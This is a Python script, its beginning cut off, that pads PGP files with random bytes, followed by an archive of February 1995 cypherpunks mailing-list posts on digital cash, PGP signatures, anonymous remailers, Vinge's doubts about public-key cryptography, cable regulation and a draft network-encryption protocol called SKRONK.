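LENGTH_FORMATS = {0: ">B", 1: ">H", 2: ">I"}  # CTB low two bits -> length field layout


class PadError(ValueError):
    """The input is not a file this procedure can pad."""


def read_ctb(data, pos):
    """Parse the CTB and length field at data[pos:].

    Returns (ctb_without_length_bits, body_length, header_size);
    body_length is None for an indefinite-length packet (length bits == 3).
    """
    if pos >= len(data) or data[pos] < 0x80:
        raise PadError("missing CTB or high bit not set")
    ctb, length_type = data[pos] & 0xFC, data[pos] & 0x03
    if length_type == 3:
        return ctb, None, 1
    fmt = LENGTH_FORMATS[length_type]
    width = struct.calcsize(fmt)
    field = data[pos + 1:pos + 1 + width]
    if len(field) != width:
        raise PadError("truncated length field")
    return ctb, struct.unpack(fmt, field)[0], 1 + width


def pad_pgp(data, new_size, rng=os.urandom):
    """Return `data` grown to exactly `new_size` bytes.

    `data` is a binary (not ASCII-armored) file holding one pubkey header
    packet followed by one conventional-encrypted packet, as in the post.
    `rng(n)` must return n unpredictable bytes; the default is the OS CSPRNG.
    """
    ctb, length, header_size = read_ctb(data, 0)
    if ctb != CTB_PUBKEY_HEADER or length is None:
        raise PadError("file does not start with a definite-length pubkey header")
    conv_at = header_size + length
    if conv_at > len(data):
        raise PadError("truncated pubkey header packet")

    ctb, length, header_size = read_ctb(data, conv_at)
    if ctb != CTB_CONVENTIONAL or length is None:
        raise PadError("second packet is not a definite-length conventional packet")
    body = data[conv_at + header_size:]
    if len(body) != length:
        # Stricter than the Perl script, which copies whatever follows.
        raise PadError("conventional packet does not run to the end of the file")

    # The rewritten header is always 1 CTB byte + 4 length bytes.
    new_length = new_size - conv_at - 5
    if new_length < length:
        raise PadError("requested size is smaller than the rewritten file")
    header = struct.pack(">BI", ctb | 2, new_length)
    return data[:conv_at] + header + body + rng(new_length - length)


def sample_file():
    """Constructed stand-in for a .pgp file: the packet bodies are filler, not real ciphertext."""
    pubkey_packet = bytes([CTB_PUBKEY_HEADER | 0, 10]) + bytes(range(10))
    conv_packet = struct.pack(">BH", CTB_CONVENTIONAL | 1, 300) + bytes(300)
    return pubkey_packet + conv_packet


if __name__ == "__main__":
    original = sample_file()
    padded = pad_pgp(original, 400)
    print(len(original), "->", len(padded), "bytes;",
          "conventional packet now declares", read_ctb(padded, 12)[1], "bytes")
```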





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 4 Feb 95 07:31:56 PST
To: Anonymous <cypherpunks@toad.com
Subject: Re: <none specified>
Message-ID: <v01510100ab5909e219ad@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:19 AM 2/4/95, Anonymous wrote:
>I wonder if 'Net-cash' is any good?

Probably the best discussion of the available transaction
processing/settlement mechanisms is by Jason Solinsky. It's called "An
Introduction to Electronic Commerce", and though he probably hasn't updated
it since he wrote it a few months ago, he discusses NetCash there...


http://nearnet.gnn.com/gnn/meta/finance/feat/sol.html

Take a bow, Jason.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tjb@acpub.duke.edu (Tom Bryce)
Date: Sat, 4 Feb 95 09:05:15 PST
To: cypherpunks@toad.com
Subject: signature validation on secure edit messages
Message-ID: <v01510106ab5965a112c3@[152.3.113.8]>
MIME-Version: 1.0
Content-Type: text/plain


Jeez. I really don't know why the heck this always happens to me, my
digsigs not validating.

You can finger me at tjbryce@amherst.edu to retrieve a message with a valid
signature.

I always write the message in eudora, copy it, sign it in MacPGP as TEXT
with attached signature, then go back and paste it over the old message.
Then I go back to MacPGP and check the signature on the clipboard to be
sure - no problems. But after getting mailed, it doesn't work.

Damn.

Tom






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Sat, 4 Feb 95 11:19:53 PST
To: cypherpunks@toad.com
Subject: Re: re to hfinney
In-Reply-To: <9502032142.AA17527@TeleCheck.com>
Message-ID: <950204.123917.2m0.rusnews.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, turner@telecheck.com writes:

>> also , where can i get perl for dos , any idea ? tia .

> PERL can be obtained via anon FTP:
> 
>  ftp.uu.net                     137.39.1.9
>  archive.cis.ohio-state.edu     128.146.8.52
>  jpl-devvax.jpl.nasa.gov        128.149.1.43
> 
> Get the source code and start compiling... :>

Bring a lunch... you'll be at it a while.  :)

Perl is a non-trivial port to MS-DOS, but there are versions available.
Look on your favorite SimTel mirror site:

Directory SimTel/msdos/perl/
 Filename   Type Length   Date    Description
==============================================
bperl3s1.zip  B  505075  940412  32-bit Perl 4.0pl36 w/VM & Win supt. (src 1/3)
bperl3s2.zip  B  530821  940412  32-bit Perl 4.0pl36 w/VM & Win supt. (src 2/3)
bperl3s3.zip  B  522530  940412  32-bit Perl 4.0pl36 w/VM & Win supt. (src 3/3)
bperl3x.zip   B  482794  940412  32-bit Perl 4.0pl36 w/VM & Win 3.1 supt. (exe)
perl4019.zip  B  196446  920620  UNIX-based scripting lang. replaces sh/awk/sed
perl419x.zip  B  435591  920317  Len Reed's port of Unix Perl v4.19
ptch19.zip    B  116444  920317  Len Reed's patch set to make perl 4.19
 
- -- 
       Roy M. Silvernail         [ ]  roy@cybrspc.mn.org
                    PGP public key available by mail
     echo /get /pub/pubkey.asc | mail file-request@cybrspc.mn.org
         These are, of course, my opinions (and my machines)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Sat, 4 Feb 95 11:06:20 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: PGP padding scripts (again)
In-Reply-To: <199502041816.KAA20644@jobe.shell.portal.com>
Message-ID: <Pine.SV4.3.91.950204130137.5569A-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 4 Feb 1995, Hal wrote:

> Sorry for the bandwidth waste, but my anonymous correspondent was not
> able to ftp these scripts.  I also got another request for the scripts.
> So here again is my post with a pair of perl scripts which will insert
> padding pretty much undetectably into a .pgp file.  The one limitation is
> the quality of Perl's random number generator.

I've put em' up on my auto-responder. Send a message to: skaplin@c2.org
With the subject: SEND FILE pad

And you should get them within a couple of hours. 

Sam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 4 Feb 95 14:12:44 PST
To: cypherpunks@toad.com
Subject: finney's perl scripts
Message-ID: <199502042212.OAA09528@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


hal , gotta question regarding your perl scripts .
 i ran em thru sh and d/l'd em , and here are the
results of my tests . first , i pgp'd a file in
 binary format , then ran " perl pgppadt.pl
test.pgp 10 " . the error i got was " Couldn't
 create test.pgp.pad " . so i renamed the file to
" test " and tried again with good results ! i got
 " Input file test has size 732 bytes 10 bytes 
pgppad returns code -3 " . then , i ran " perl 
 pgppad.pl test 10 " and after the bit about perl
running under dos/4gw protected mode , i get dropped
 to my command prompt . i took a look at the file ,
and it's size wasn't any different , so i renamed the
 file to test.pgp and ran it again and got the same
results . so i guess i'm wonderin' if it added the
 padding , or what might be the problem ? for your
info , i'm using perl 4.0.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 4 Feb 95 11:53:03 PST
To: hfinney@shell.portal.com>
Subject: Re: There is another NetCash
Message-ID: <v01510102ab593f760d33@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:09 AM 2/4/95, Hal wrote:

>Some payment system is probably better than none, but I hate to see
>the name "cash" expropriated by these non-cash systems.

Indeed. That was the point of the URL to Mr. Solinsky's excellent
introduction to the subject.

It is easy to see that the original NetCash isn't a digital cash system,
with its clearing of a single-use serial number transmitted unencrypted in
the clear, and with its "bank" settling the transaction through the telco
900-number system. Not having looked yet, I bet the "other" NetCash is
probably not Chaumian-equivalent digital cash either, or we'd have heard
more about it. It would be a pretty major accomplishment, especially if it
doesn't violate Chaum's patents.

As Eric has said here recently, we have to remember the difference between
transaction clearing (which First Virtual, for example, does well, at least
as a prima facie system) and transaction settlement (which FV does on the
back of the Visa/MC network), which is what a true cash-settlement system
would do in one stroke.

Someday, and not now, I would like to take up the cudgel and jumpstart the
old offline/online cash debate. I like offline cash because it doesn't
require a bank intervention at every transaction, double-spending cash and
"inside-job" private key theft notwithstanding...

Ah, well.

Someday.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Sat, 4 Feb 95 14:31:31 PST
To: perry@imsi.com
Subject: Re: How the cypherpunks nearly got me fired (long)
In-Reply-To: <9502011435.AA26645@snark.imsi.com>
Message-ID: <m0raoM0-0009tFC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> Michael Sattler says:
> > At 22:10 1/31/95, David Mandl wrote:
> > 
> > [really horrid story about true life at a corporate dinosaur deleted]
...
> 
> I'm a consultant. However, I won't take on clients with sufficiently
> distasteful business practices. This is something I consider to be
> sufficiently distasteful.
> 
> Perry

Absolutely!

Good net access and good business practices are becoming requirements for
employment for many techies now.

It might be worthwhile to start keeping a list, a la 'The Great Piss List'
(whatever happened to it?), on business practices and net availability
at various companies.  Not to mention use and attitude toward privacy,
encryption, etc.  A name...  How about "Cyber-Work-Space Report".

I'll volunteer to start the list if people want to email me anything.
I can put it on my (slow but permanent) web site also.  Even if I
don't have much time, which is probable, I can make the messages available.

I can come up with details on at least 4.  The only issue I can think
of is being careful of not violating non-disclosures, but for the most
part I don't think it'll be a problem.  It's not much different from
asking: "How's the cafeteria", or "is the phone system nice".  I'll
also strip identity if requested.  You could always write a
description and ask for an OK from your manager to tell friends
because it would help them decide whether to work there.  (Which is
actually true.)

Since this is only partially tied in to cypherpunks, feel free to cross-post
and add attributes.

Initial attribute list:

Company:

Type of job:
(ie.: techies probably have more likelihood of net access, etc.)

Plans:
(ie.: things promised or talked about seriously)

Privacy of email:

Routine scanning:

Encourage/discourage encryption:

Key management:
(ie.: Any planning for the 'Mack truck' scenario)

Net Access:
(email/Netnews/telnet/ftp(in/out)/irc/aol/various/Web server(public/internal),
 Business only/Educational-curiosity/Full use (a true fringe))

Justification:
(What was the argument used to get and/or maintain net access)

Platforms and software typically used:

Strategies used, good or bad, to limit 'addiction':

sdw
-- 
Stephen D. Williams    25Feb1965 VW,OH      sdw@lig.net http://www.lig.net/sdw
Senior Consultant    513-865-9599 FAX/LIG   513.496.5223 OH Page BA Aug94-Feb95
OO R&D AI:NN/ES crypto     By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430
Firewall/WWW srvrs ICBM/GPS: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W wrk
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.28Jan95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Sat, 4 Feb 95 17:52:44 PST
To: cypherpunks@toad.com
Subject: Re: Vinge on PKE ?
In-Reply-To: <m0ravI7-0013GtC@garnet.msen.com>
Message-ID: <199502050152.RAA07725@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> lwp@garnet.msen.com (Lou Poppler) writes:
> important postings.  Some time ago it was asked why Vernor Vinge
> made passing reference to humans' naivete in trusting public key
> encryption, and some posters were seeking to contact professor

I don't recall the conversation, but it could refer to his recent novel
"A Fire Upon the Deep."  Our galaxy is divided into a number of zones where
computation can be easier or harder than in the particular section where
the Earth hangs out.  The fastest zones have computational ability so far
beyond what's physically possible in our zone that we don't understand it.

In this situation you can't trust your security to merely computationally
difficult problems like factoring large numbers: the denizens of the faster
zones could crack them faster than slower communicators could enumerate them.

The protagonists spent a fair amount of time on a courier ship that was
carrying as its cargo 1/3 of a one-time-pad, which was intended to get
to the buyer and be XORed with the other two pieces.  This was a valuable
cargo.  After it became clear that this 1/3 was potentially compromised it
was used for some important but less provably reliable communications.

	Jim Gillogly
	Trewesday, 15 Solmath S.R. 1995, 01:49




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 4 Feb 95 18:43:14 PST
To: cypherpunks@toad.com
Subject: Re:  Why encrypt intra-remailernet.
Message-ID: <199502050242.SAA00239@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


> Date: Sun, 29 Jan 1995 17:56:34 -0800
> From: Hal <hfinney@shell.portal.com>
> 
> Of course it was Chaum himself in his 1981 paper (which I think is
> available from the CP FTP site) who described the duplicate-message
> attack.  I don't see that inter-remailing encryption helps much,
> because the attacker can still notice that whenever they inject
> message A, _something_ goes to Bob.  The real solution, as Chaum
> pointed out, is that the remailer must reject duplicate messages,
> even when separated by days.  Doing this without keeping a database
> of all messages ever sent is left as an exercise.

  Perhaps the postage could integrally contain the request-remailing-
to field.  Suppose the postage were <e-money, to-address> encrypted to
the remailer.  Then replayers would want to copy the to-address into a
new piece of postage.  But, we assume, they can't figure out what it
is because they don't have the key for the remailer.  

  If the remailer issued its own non-blinded stamps, the remailer
would have to keep a list of canceled stamps.  (For as long as that
series of stamps remains valid.)  If the remailer used Chaumian e-cash
no logs would need to be kept at all.

> Another aspect worth mentioning is that message splitting can make
> the kinds of statistical correlations that Wei Dai was looking at
> more of a danger.  [...]  Ideally you'd want to dribble them out at
> some standard rate, a rate at which you always send a message
> whether you have something to send or not.  But this may introduce
> unacceptable latency.

  If everybody ran a second level remailer, and if they always
forwarded something (of very nearly the same size) when they received
an encrypted message, then without compromising the user's machine it
would be impossible to say when a message was delivered.  Some of the
messages forwarded would need to be junk.  Is there a polite way to
send mail to a remailer, and ask it to junk the mail?  Some of the
messages forwarded would have to be 'part n of m' messages.

  Noyb




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lwp@garnet.msen.com (Lou Poppler)
Date: Sat, 4 Feb 95 16:57:38 PST
To: cypherpunks@toad.com
Subject: Vinge on PKE ?
Message-ID: <m0ravI7-0013GtC@garnet.msen.com>
MIME-Version: 1.0
Content-Type: text/plain


Apologies if I repeat a question which has already been answered.
My only gateway onto the Net is very expensive, and I miss many
important postings.  Some time ago it was asked why Vernor Vinge
made passing reference to humans' naivete in trusting public key
encryption, and some posters were seeking to contact professor
Vinge for clarification.  Has any further explanation been 
discovered for his distrust of PKE?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Poppler <lwp@garnet.msen.com>
Date: Sat, 4 Feb 95 18:33:47 PST
To: cypherpunks@toad.com
Subject: Re: Vinge on PKE ?
In-Reply-To: <199502050152.RAA07725@mycroft.rand.org>
Message-ID: <Pine.BSI.3.91.950204211924.25224A-100000@garnet.msen.com>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 4 Feb 1995, Jim Gillogly wrote:
> "A Fire Upon the Deep."  Our galaxy is divided into a number of zones where
> computation can be easier or harder than in the particular section where
/.../ 
> In this situation you can't trust your security to merely computationally
> difficult problems like factoring large numbers: the denizens of the faster
> zones could crack them faster than slower communicators could enumerate them.

Yes, and even in the here and now, we suspect the existence of Powers with 
computational resources far in excess of our own.  But do we know for 
sure that PKE *must* rely on computational obfuscation?  Is it 
demonstrable that access to a public key always yields the secret key, 
given sufficient computational power?  Or is this only a result of the 
clumsy way we construct our keypairs here in the slow zone?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@panix.com>
Date: Sat, 4 Feb 95 19:26:57 PST
To: extropians@extropy.org
Subject: Re: Forward: Teleco/Cabe REg. & Free speech
In-Reply-To: <Pine.SUN.3.91.950204182755.14091B-100000@access.mbnet.mb.ca>
Message-ID: <199502050326.AA26218@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



> paid for by digital cash.  Such a means of exchanging print, audio, 
> video, or any software might be virtually impossible to censor.  Would it 
> be possible to build such a network using current cable systems?  

It is a reasonable bet that all data into the home will come on
cable systems which means they require encryption anyway.. they
are bridged, not point-to-point...

And other traffic like mobile voice and data will use some RF
technology...  which also requires encryption...

Existing cable systems are now running 1 gigahertz of bandwidth and
I had presentations from TW staff indicating 2 gigahertz is easily
reachable.. 

Figure 2 gigahertz of bandwidth (split between analog and digital
services) in each neighborhood and an ATM switch pulling those signals
back to the "head-end/central office" via fiber, and you have the
cable system of the future.. (e.g, for the next 5 to 20 years)..

/hawk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mikepb@freke.lerctr.org (Michael P. Brininstool)
Date: Sat, 4 Feb 95 15:42:16 PST
To: cypherpunks@toad.com
Subject: Re: Forward: Teleco/Cabe REg. & Free speech
In-Reply-To: <199502041358.AA09885@panix.com>
Message-ID: <1995Feb4.153121.29573@freke.lerctr.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <199502041358.AA09885@panix.com> habs@panix.com (Harry S. Hawk) writes:
>TELECOM REFORM, REPUBLICAN-STYLE Sen. Larry Pressler (R-SD) has
>proposed a telecommunications reform plan that would drop all cable TV
>rate regulations; allow local phone and cable competition and
>cross-ownership in one year; ease foreign ownership restrictions; and
>allow local phone companies to compete in long distance in three
>years. A formal counter proposal is expected from the Democrats
>February 14, and it's expected that there will be objections to most
>of the provisions outlined in Pressler's bill. (Investor's Business
>Daily 2/2/95 A4)
>
>(((cut here)))
>
>For those that don't know I have my Master's in Interactive
>Telecommunications, and have long looked at cable and teleco from
>several angles including freemarket and cypherpunk viewpoints.

I have to agree.  When I first moved to Austin Texas, the rates for
cable were not too bad, we were in an area that had a choice between
two cable companies.  After a couple years, a third company, a wireless
company came into town.  I then moved to Plano Texas, outside of
Dallas, and was absolutely SHOCKED at the cable prices.  Of course, in
Plano, there was ONE cable company, and all the channels except
broadcast channels were scrambled, so you HAD to get the cable box.  In
Austin, I could use the VCR tuner.  The only scrambled channels were
the premium channels.  The service in Austin was better and about 2/3
the cost.  I definitely feel that competition is a MUST!

---------------------------------------------------------|
| #include "std/disclaimer.h"     Michael P. Brininstool |
| mikepb@freke.lerctr.org      OR      mikepb@netcom.com |
|---------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Sat, 4 Feb 95 23:17:28 PST
To: CRSO.Cypherpunks@canrem.com
Subject: Re: Vinge on PKE ?
In-Reply-To: <60.19880.6525.0C1CDEB4@canrem.com>
Message-ID: <m0rb1D8-0004IoC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


> LP+Apologies if I repeat a question which has already been answered.
>   +My only gateway onto the Net is very expensive, and I miss many
>   +important postings.  Some time ago it was asked why Vernor Vinge
>   +made passing reference to humans' naivete in trusting public key
>   +encryption, and some posters were seeking to contact professor
>   +Vinge for clarification.  Has any further explanation been 
>   +discovered for his distrust of PKE?
> 
> I once had a girlfriend who factored five digit numbers just by 
> looking at them.  "29367?  No, that's not prime.  It's 117 times 
> 251..."  Good ol' Elizabeth.  That's what you get for an "IQ" of 
> around 175.  Surely there might be higher "IQ's" someplace else in 
> Universe?
>  
> Albert Szent-Georgi once told me his thought that an IQ difference of 
> thirty points meant that one person solves by inspection problems which 
> no amount of explanation can make clear to the other.  He added that 
> in a normal day we run into people spanning three such gulfs.
>  
> If an IQ of 100 routinely factors two digit decimal numbers, and you 
> get another digit for every twenty or thirty points, then you're 
> looking for beings with IQ's in the 1,000 range to factor 100 digits 
> binary...

There is a class of people called "idiot savants" who contain people who can also solve such
problems by inspection - their IQs are often much lower than 100, so that
blows Albert's theory.  These so-called "idiot savants" can easily factor
100 digit numbers.  The ability to solve such problems is not tied to IQ,
as there are many such people with IQs of 150+ who cannot solve them.
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

Cop: "How many beers have you had tonight, bro?"
Suspect: "Seventy."  -- from the TV show "Cops"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcottrell@popmail.ucsd.edu (Lance Cottrell)
Date: Sun, 5 Feb 95 00:22:00 PST
To: cypherpunks@toad.com
Subject: Re:  Why encrypt intra-remailernet.
Message-ID: <ab5a3af601021004300d@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


>  If the remailer issued its own non-blinded stamps, the remailer
>would have to keep a list of canceled stamps.  (For as long as that
>series of stamps remains valid.)  If the remailer used Chaumian e-cash
>no logs would need to be kept at all.

I was not under the impression that Chaum e-cash was free from the need to
keep a list of spent cash. Do you mean that it would be the bank, not the
remailer, that would keep the database?
>
>> Another aspect worth mentioning is that message splitting can make
>> the kinds of statistical correlations that Wei Dai was looking at
>> more of a danger.  [...]  Ideally you'd want to dribble them out at
>> some standard rate, a rate at which you always send a message
>> whether you have something to send or not.  But this may introduce
>> unacceptable latency.
>
>  If everybody ran a second level remailer, and if they always
>forwarded something (of very nearly the same size) when they received
>an encrypted message, then without compromising the user's machine it
>would be impossible to say when a message was delivered.  Some of the
>messages forwarded would need to be junk.  Is there a polite way to
>send mail to a remailer, and ask it to junk the mail?  Some of the
>messages forwarded would have to be 'part n of m' messages.
>
>  Noyb

Messages are not identifiable as "part n of m" except at the last hop. If
you are a remailer, then they are only visible as such to you. In transit
they appear as any other message. Yes, there is a polite way to send to a
remailer's bit bucket with some remailers. Ghio remailers will trash any
message sent which requests remailing to "null". Remailer@nately is a Ghio
remailer. I can't remember if I implemented that in Mixmaster. If not, I
will.

--------------------------------------------------
Lance Cottrell  who does not speak for CASS/UCSD
loki@nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Check out my essay on the next generation remailer Mixmaster on the WWW page.
For anon remailer info, mail remailer@nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: david.lloyd-jones@canrem.com (David Lloyd-Jones)
Date: Sat, 4 Feb 95 23:00:50 PST
To: cypherpunks@toad.com
Subject: Vinge on PKE ?
In-Reply-To: <m0ravI7-0013GtC@garnet.msen.com>
Message-ID: <60.19880.6525.0C1CDEB4@canrem.com>
MIME-Version: 1.0
Content-Type: text/plain


LP+Apologies if I repeat a question which has already been answered.
  +My only gateway onto the Net is very expensive, and I miss many
  +important postings.  Some time ago it was asked why Vernor Vinge
  +made passing reference to humans' naivete in trusting public key
  +encryption, and some posters were seeking to contact professor
  +Vinge for clarification.  Has any further explanation been 
  +discovered for his distrust of PKE?

I once had a girlfriend who factored five digit numbers just by 
looking at them.  "29367?  No, that's not prime.  It's 117 times 
251..."  Good ol' Elizabeth.  That's what you get for an "IQ" of 
around 175.  Surely there might be higher "IQ's" someplace else in 
Universe?
 
Albert Szent-Georgi once told me his thought that an IQ difference of 
thirty points meant that one person solves by inspection problems which 
no amount of explanation can make clear to the other.  He added that 
in a normal day we run into people spanning three such gulfs.
 
If an IQ of 100 routinely factors two digit decimal numbers, and you 
get another digit for every twenty or thirty points, then you're 
looking for beings with IQ's in the 1,000 range to factor 100 digits 
binary...
 
                       Cheers,
 
                               -dlj.

david.lloyd-jones@canrem.com

 * 1st 1.11 #3818 * "640k should be enough for anybody" - Bill Gates, 1981.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcottrell@popmail.ucsd.edu (Lance Cottrell)
Date: Sun, 5 Feb 95 00:53:11 PST
To: cypherpunks@toad.com
Subject: Mixmaster client release
Message-ID: <ab5a41f403021004d49b@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have put a SPARC executable for the Mixmaster client on my home page. It
is easy to install, just run one script. Please send me any comments.
-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLzSSA1Vkk3dax7hlAQGhyAP8DkA2AetIpCHfFhnUDP8qiKdPJ3ish36V
ZFA/W3Gx+6Glzj+5ri7fnug6N3ENyLJ3eoUfWVWjJ6uK5yMczMQB6wX4m3Afhrwz
xUw9WCKwbP0cktnLnMvbufDxyLTsGxA6yvWaRdCRVcqP4eyAVN4SiHCftE8EbI6Y
Pg+3SYtjDf4=
=5lAa
-----END PGP SIGNATURE-----

--------------------------------------------------
Lance Cottrell  who does not speak for CASS/UCSD
loki@nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Check out my essay on the next generation remailer Mixmaster on the WWW page.
For anon remailer info, mail remailer@nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strick at The Yak <strick@yak.net>
Date: Sun, 5 Feb 95 02:03:31 PST
To: cypherpunks@toad.com
Subject: The SKRONK protocols (version 0.6)
Message-ID: <199502051002.CAA01090@nando.yak.net>
MIME-Version: 1.0
Content-Type: text/plain


========================================================================
The SKRONK protocols                                         version 0.6
========================================================================
                                                        Henry Strickland 
                                                        <strick@yak.net>
                                                        Sun Feb  5  1995


                          This is a working document, subject to change. 
                                                   Please comment on it!


Skronk is a user-level C library that re-implements the usual "posix
i/o" (unix man 2) functions and "berkeley socket" functions with a set
of functions that can use enhanced or alternate ("skronked") protocols
for TCP connections.  (Typical enhancements could be authentication
and/or encryption of the connection.)  A simple negotiation protocol
allows the clients and servers to agree on what enhancements are
desired or required.

Skronk is designed so that your common unix network clients and servers
(telnet, sendmail, ftp, nntp, X11, etc.) can be merely relinked with the
skronk library (libskronk.a) without changing the source code for the
programs.

As a matter of configuration and policy, skronked clients and servers
may choose either to interoperate with normal (non-skronked) client and
servers or to forbid normal connections.  In order to not interfere
with non-skronked programs, skronked connections take place on
alternate TCP server port numbers.

/* "Skronk" is a musical term, for a new-york-ish free-jazz 
 *   massively saxophonish kind of music, e.g. John Zorn  
 */


---- THE UDP PROTOCOL BEGINS HERE ----

THE SKRONK MAP DAEMON

A skronk map daemon is a UDP service that tells what skronked services are
available from a site, and what alternate TCP server port numbers they
use.

The skronk map daemon receives "skronk map request" packets and returns
"skronk map reply" packets that list pairs of port numbers, mapping
normal server port numbers to corresponding skronked port numbers.  The
skronk map reply packet is sent to the same IP address and host port
that the request was received from.

If there is no map reply in a certain time, after a couple of 
map request resends, the skronk map client should assume that 
skronked services are not currently available on that host.

SKRONK MAP REQUEST PACKET

See "struct skronk_map_request" below.  The comment will say
something like "finger skronk@yak.net for info", to explain what
is going on to network administrators who see these packets for
the first time probing their hosts.

SKRONK MAP REPLY PACKET

See "struct skronk_map_reply" below.  The "serial" field should
match the serial field of the map request packet.  Replies be cached,
using the "ttl" time-to-live field for a timeout.

If the request packet cannot be replied to (perhaps because the action
was not understood, or the version was wrong), a reply with action
SKRONK_MAP_NACK should be returned.  If the magic field of the request
is wrong, do not reply.  (The magic number should be changed if the
first five fields are changed; otherwise, version and opcode may be
changed to implement new protocols.)

Skronk map clients should also recognize as a reply the 
relevant ICMP packets indicating that there is no skronk map daemon.

Version numbers 128 through 255 will not be assigned and are
available for experimentation.  Action codes 128 through 255 will
not be assigned and are available for experimentation.

Initial prototypes use UDP port 333 for the skronk map service,
until a number is officially allocated.

--------------------------------

        /* unsigned long = 4 octets, "network" order */
        /* unsigned short = 2 octets, "network" order */
        /* char = 1 octet, ASCII encoding, NUL terminated */

        struct skronk_map_request {
                unsigned long   magic;          /* SKRONK_MAGIC */
                unsigned long   serial;
                unsigned short  version;        /* SKRONK_VERSION */
                unsigned short  action;         /* SKRONK_MAP_REQUEST */
                unsigned long   reserved;       /* (corresponds to ttl) */
                char            comment[1];  /* variable length, NTBS */
                /* after NUL, remainder of packet ignored */
        };

        #define SKRONK_MAGIC    0x1F1206FB  /* tail(md5("SKRONK_MAGIC\n")) */
        #define SKRONK_VERSION  0x0101      /* major 1 minor 1 */

        #define SKRONK_MAP_REQUEST      63      /* '?' */
        #define SKRONK_MAP_RESPONSE     46      /* '.' */
        #define SKRONK_MAP_NACK         33      /* '!' */

        #define SKRONK_DEFAULT_TTL      3600    /* one hour */

        #define SKRONK_NUM_TRIES        3       /* try three packets */
        #define SKRONK_WAIT_TIME        3       /* wait three seconds */

        struct skronk_map_reply {
                unsigned long   magic;          /* SKRONK_MAGIC */
                unsigned long   serial;         /* matches map request serial */
                unsigned short  version;        /* SKRONK_VERSION */
                unsigned short  action;         /* SKRONK_MAP_REPLY or _NACK */
                unsigned long   ttl;            /* cache time to live, in seconds */
                unsigned short  map[1];         /* variable length, 0 terminate */
                /* after 0, remainder of packet ignored */
        };

--------------------------------


EXAMPLE SKRONK MAP REQUEST AND REPLY

Map Request Packet:

   ip header:
        UDP             protocol
        128.32.43.52    source_ip_address
